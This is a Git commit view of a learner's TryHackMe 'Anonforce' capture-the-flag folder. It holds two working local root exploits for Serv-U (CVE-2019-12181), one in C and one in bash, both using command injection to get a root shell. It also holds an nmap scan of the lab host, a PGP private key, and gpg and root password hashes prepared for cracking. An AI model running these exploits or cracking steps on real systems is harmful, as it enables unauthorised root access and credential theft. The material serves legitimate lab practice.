curo/TryHackMe
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

initial commit

Browse Source
This commit is contained in:
Curo
2025-12-04 09:57:17 +01:00
commit 0054cc02b1
4851 changed files with 4416257 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
CTF/Anonforce/backup.pgp Normal file
View File

Binary file not shown.

24
CTF/Anonforce/exploit.c Normal file
View File

@@ -0,0 +1,24 @@
/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
int main()
{
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
// if execv is successful, we won't reach here
printf("ret val: %d errno: %d\n", ret_val, errno);
return errno;
}

37
CTF/Anonforce/exploit.sh Executable file
View File

@@ -0,0 +1,37 @@
#!/bin/bash
# SUroot - Local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181)
# Bash variant of Guy Levin's Serv-U FTP Server exploit:
# - https://github.com/guywhataguy/CVE-2019-12181
# ---
# user@debian-9-6-0-x64-xfce:~/Desktop$ ./SUroot
# [*] Launching Serv-U ...
# sh: 1: : Permission denied
# [+] Success:
# -rwsr-xr-x 1 root root 117208 Jun 28 23:21 /tmp/sh
# [*] Launching root shell: /tmp/sh
# sh-4.4# id
# uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),117(scanner)
# ---
# <bcoles@gmail.com>
# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181
if ! test -u "/usr/local/Serv-U/Serv-U"; then
echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
exit 1
fi
echo "[*] Launching Serv-U ..."
/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
if ! test -u "/tmp/sh"; then
echo '[-] Failed'
/bin/rm "/tmp/sh"
exit 1
fi
echo '[+] Success:'
/bin/ls -la /tmp/sh
echo "[*] Launching root shell: /tmp/sh"
/tmp/sh -p

60
CTF/Anonforce/nmap_scan1.txt Normal file
View File

@@ -0,0 +1,60 @@
# Nmap 7.95 scan initiated Fri Oct 17 19:15:33 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oN nmap_scan1.txt 10.10.210.93
Nmap scan report for 10.10.210.93
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 0 0 4096 Aug 11 2019 bin
| drwxr-xr-x 3 0 0 4096 Aug 11 2019 boot
| drwxr-xr-x 17 0 0 3700 Oct 17 10:13 dev
| drwxr-xr-x 85 0 0 4096 Aug 13 2019 etc
| drwxr-xr-x 3 0 0 4096 Aug 11 2019 home
| lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
| lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
| drwxr-xr-x 19 0 0 4096 Aug 11 2019 lib
| drwxr-xr-x 2 0 0 4096 Aug 11 2019 lib64
| drwx------ 2 0 0 16384 Aug 11 2019 lost+found
| drwxr-xr-x 4 0 0 4096 Aug 11 2019 media
| drwxr-xr-x 2 0 0 4096 Feb 26 2019 mnt
| drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 notread [NSE: writeable]
| drwxr-xr-x 2 0 0 4096 Aug 11 2019 opt
| dr-xr-xr-x 95 0 0 0 Oct 17 10:13 proc
| drwx------ 3 0 0 4096 Aug 11 2019 root
| drwxr-xr-x 18 0 0 540 Oct 17 10:13 run
| drwxr-xr-x 2 0 0 12288 Aug 11 2019 sbin
| drwxr-xr-x 3 0 0 4096 Aug 11 2019 srv
| dr-xr-xr-x 13 0 0 0 Oct 17 10:13 sys
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.99.89
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8a:f9:48:3e:11:a1:aa:fc:b7:86:71:d0:2a:f6:24:e7 (RSA)
| 256 73:5d:de:9a:88:6e:64:7a:e1:87:ec:65:ae:11:93:e3 (ECDSA)
|_ 256 56:f9:9f:24:f1:52:fc:16:b7:7b:a3:e2:4f:17:b4:ea (ED25519)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 127.91 ms 10.14.0.1
2 127.72 ms 10.10.210.93
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 17 19:15:41 2025 -- 1 IP address (1 host up) scanned in 8.20 seconds

62
CTF/Anonforce/private.asc Normal file
View File

@@ -0,0 +1,62 @@
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG v1.56
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
3ELdayAA8xm2L+QD7Q==
=Wwny
-----END PGP PRIVATE KEY BLOCK-----

1
CTF/Anonforce/privateJohn Normal file
View File

@@ -0,0 +1 @@
anonforce:$gpg$*17*54*2048*e419ac715ed55197122fd0acc6477832266db83b63a3f0d16b7f5fb3db2b93a6a995013bb1e7aff697e782d505891ee260e957136577*3*254*2*9*16*5d044d82578ecc62baaa15c1bcf1cfdd*65536*d7d11d9bf6d08968:::anonforce <melodias@anonforce.nsa>::private.asc

1
CTF/Anonforce/private_hash Normal file
View File

@@ -0,0 +1 @@
anonforce:$gpg$*17*54*2048*e419ac715ed55197122fd0acc6477832266db83b63a3f0d16b7f5fb3db2b93a6a995013bb1e7aff697e782d505891ee260e957136577*3*254*2*9*16*5d044d82578ecc62baaa15c1bcf1cfdd*65536*d7d11d9bf6d08968:::anonforce <melodias@anonforce.nsa>::private.asc

1
CTF/Anonforce/root_hash Normal file
View File

@@ -0,0 +1 @@
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::